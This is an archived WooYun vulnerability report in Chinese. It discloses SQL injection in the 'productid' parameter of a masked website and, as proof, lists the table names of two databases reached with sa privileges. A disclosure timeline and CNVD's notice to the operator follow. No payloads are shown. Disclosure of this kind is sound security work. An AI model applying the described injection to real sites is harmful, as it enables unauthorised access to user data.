乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-03: 细节已通知厂商并且等待厂商处理中 2015-12-08: 厂商已经确认,细节仅向厂商公开 2015-12-18: 细节向核心白帽子及相关领域专家公开 2015-12-28: 细节向普通白帽子公开 2016-01-07: 细节向实习白帽子公开 2016-01-22: 细节向公众公开
RT
主站地址:
http://**.**.**.**/pc/index.aspx
注入地址:
http://**.**.**.**/pc/productlist.aspx?productid=2参数productid可注入
数据库Back_Database的数据量证明
60张表:
Database: Back_Database[60 tables]+-----------------------------+| City || Push_Summary || gy_ControlService || gy_NeedWriteAppLog || gy_UserInstalledApp || gy_cacheimsirule || gy_cacheimsirule_tmp || lian_temp || lian_temprule || sysdiagrams || td_ActiveUser || td_ActiveUser_select || td_AlbumUserData || td_ApkFile || td_ApkInfo || td_Bug || td_ChannleApkSet || td_City || td_ErrorLog || td_Event || td_Feedback || td_Firm || td_IPListNew || td_IPSource || td_Installed || td_PackName || td_Page || td_PhoneModel || td_Project || td_PushApk || td_PushInstalled || td_PushInstalledBak || td_PushOutCount || td_PushOutCountBak || td_PushOutCount_Success || td_PushRecord_Count || td_PushRole || td_RecordApk || td_Role || td_Role_Page || td_TotalEvent || td_User || td_UserApk || td_UserGroup || td_UserGroup_Role || td_UserInstalled || td_apkbigtype || td_apkofName || td_apksmalltype || td_feedback_send || td_icontrolrealbeauty || td_icontrolrealbeautyRecord || td_imgtxtpush || td_imgtxtpush_record || td_imgtxtpush_recordBak || td_isCreateXJBHIcon || td_toolupdate || vw_PushInstalled || vw_UserInstalledApp || vw_pushrule |+-----------------------------+
sa权限可以跨库,DB_ComunityBack_online表信息
Database: DB_ComunityBack_online[129 tables]+---------------------------------+| CareAbout || GY_ArticleKind || GY_Articles || GY_Books || GY_ClickLike_Detail || GY_Comment_ClickLike || GY_Comments || GY_Download || GY_FAQ || GY_FAQAllInfo || GY_IsShowRecommandApp || GY_RecommandAPK || GY_ZhuangSuCai || Gameinfo || NTV_FriendDetail || NTV_FriendDetailStat || NT_AD || NT_ADCategory || NT_Admin || NT_AdminLog || NT_Ads || NT_Album || NT_Blog || NT_BlogComment || NT_BlogDraft || NT_C_Usered || NT_CarATC || NT_CarATCCal || NT_CarATCComment || NT_CarATCMember || NT_CarClub || NT_CarClubAreaIntro || NT_CarClubUser || NT_Co_Action || NT_Co_Area || NT_Co_Car || NT_Co_Company || NT_Co_Crash || NT_Co_Object || NT_Co_OilStation || NT_Co_Order || NT_Co_Products || NT_Co_Task || NT_Co_UserInfo || NT_Co_Usered || NT_Company || NT_Constellation || NT_Dict_Academy || NT_Dict_Area || NT_Dict_MovieSort || NT_Dict_School || NT_Dict_Vocation || NT_EmailNotify || NT_Family || NT_Financial || NT_FinancialType || NT_FootPrint || NT_Friend || NT_FriendDesc || NT_FriendInvite || NT_Game || NT_GameClass || NT_Greet || NT_GroupDiscuss || NT_GroupInvite || NT_GroupMember || NT_Help || NT_Inbox || NT_LeaveWord || NT_Letter || NT_MakeupGoods || NT_MiniBlog || NT_MiniBlogComment || NT_Notepad || NT_Notice || NT_OhterWords || NT_OnlineUser || NT_OpensocialActivities || NT_OpensocialApi || NT_Order || NT_Outbox || NT_Photo || NT_PhotoComment || NT_PhotoLasso || NT_Props || NT_Request || NT_RetrievePwd || NT_SayUs || NT_Sell_Action || NT_Sell_Dongzuo || NT_Sell_Profit || NT_SendMobile || NT_SendStatue || NT_Share || NT_ShareComment || NT_SourceMaterial || NT_SpaceTemplate || NT_SpareEmail || NT_SysNotepad || NT_Table || NT_User || NT_UserCareer || NT_UserEducation || NT_UserGroup || NT_UserInfo || NT_UserLog || NT_UserPointHistory || NT_UserProps || NT_UserSetting || NT_UserVersion || NT_Visit || NT_Vote || Nt_BookShelf || Nt_DisVote || Nt_GroupType || Nt_GroupVisit || Nt_Sell_Property || Nt_ToVote || Nt_VoteComm || Nt_VoteOption || Opensocial_activity_media_items || Sucai || Sucai_Ftype || Viw_FAQAllInfo || Viw_GetMakeupGoodsForShiZhuang || YZNum || GY_FAQ_en-us || sysdiagrams || temp |+---------------------------------+
已证明,未深入
危害等级:中
漏洞Rank:10
确认时间:2015-12-08 11:10
CNVD确认所述情况,已经由CNVD通过网站公开联系方式向网站管理单位通报。
暂无